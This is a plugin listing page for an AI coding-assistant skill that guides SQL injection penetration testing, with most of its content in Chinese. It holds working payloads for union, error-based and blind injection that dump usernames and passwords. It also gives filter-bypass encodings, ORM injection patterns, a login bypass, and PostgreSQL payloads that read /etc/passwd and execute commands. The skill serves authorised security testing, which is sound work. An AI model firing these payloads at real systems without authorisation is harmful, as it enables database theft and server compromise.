Stats
Actions
Tags
From vuln-skills
Guides SQL injection penetration testing in web apps with payloads for union-based, blind, error-based, time-based attacks, ORM injections in Django/Rails/SQLAlchemy, bypasses, and checklists.
How this skill is triggered — by the user, by Claude, or both
Slash command
/vuln-skills:pentest-sqliThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
当对 Web 应用进行 SQL 注入渗透测试时加载此 Skill。覆盖经典 SQLi、盲注、ORM 注入等攻击手法。
当对 Web 应用进行 SQL 注入渗透测试时加载此 Skill。覆盖经典 SQLi、盲注、ORM 注入等攻击手法。
高风险端点特征:
?search=, ?filter=, ?sort=, ?order= 参数/user/123, /item/abc识别信号:
You have an error in your SQL syntax, PostgreSQL: ERROR: syntax error at or near)' 后响应异常(500 错误、空白页、内容变化)id=2-1 等价于 id=1)手动测试方法:
'、"'、') 观察响应差异' AND '1'='1 vs ' AND '1'='2 对比响应' UNION SELECT NULL,NULL-- 逐步确定列数'; WAITFOR DELAY '0:0:5'--(MSSQL)或 ' AND SLEEP(5)--(MySQL)Payload 构造:
# Union-based(先确定列数)
' ORDER BY 1--
' ORDER BY 2--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password,NULL FROM users--
# Error-based(MySQL)
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--
# Time-blind
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
# Boolean-blind
' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
Bypass 技巧:
/*!50000UNION*/、uNiOn SeLeCt、内联注释 /**/%2527、Unicode 编码/**/、%09、%0a、+SEL/**/ECT、UN/**/IONSecond-order SQLi(二次注入):
admin'--)ORM 特定注入:
_connector 注入:通过操纵 Q 对象的连接器注入任意 SQLFilteredRelation:测试条件构造中的注入点text() 拼接:检查原始 SQL 片段是否含用户输入.where("name = '#{params[:name]}'")、.order(params[:sort]) 未参数化createQuery("FROM User WHERE name = '" + input + "'") 拼接.literal() 和 $raw 查询中的未转义输入PostgreSQL 特定 Payload:
# Error-based
' AND 1=CAST((SELECT version()) AS int)--
# Time-blind
'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
# 文件读取
' UNION SELECT pg_read_file('/etc/passwd',0,1000)--
# 命令执行(需 superuser)
'; COPY cmd_exec FROM PROGRAM 'id';--
' 并观察响应变化(错误信息、状态码、内容差异)AND 1=1 vs AND 1=2)/api/items/1')是否存在注入SLEEP(5) / pg_sleep(5) / WAITFOR DELAY)LOAD_FILE)或写入文件(INTO OUTFILE)漏洞利用可达到的效果:
' OR '1'='1 绕过登录验证xp_cmdshell、LOAD_FILE/INTO OUTFILE)严重度判断:
以下案例来自 HackerOne 公开披露的真实漏洞报告,展示了该类漏洞在实际目标中的表现形式。
_connector in Q ObjectsA SQL injection vulnerability was discovered in the customerId parameter of the URL path. The vulnerability was demonstrated by adding a quote in the customer...
███████ via theme_namenpx claudepluginhub yhy0/ghsa-skill-builder --plugin vuln-skillsHunts SQL and NoSQL injection vulnerabilities using patterns from 12 bug bounty reports. Covers MongoDB $regex/$where, ORM raw-fragment SQLi, SOQL injection, blind SQLi in GraphQL, and OIDC-proxy backends.
Executes SQL injection vulnerability assessments on web applications to identify database security flaws, demonstrate exploitation techniques, and validate input sanitization.
SQL injection testing methodology covering error-based, union, blind, NoSQL, GraphQL, WebSocket, and JSON-operator attacks. Includes WAF bypass, DB-specific exploitation, ORM CVE tracking, and automation with sqlmap/ghauri.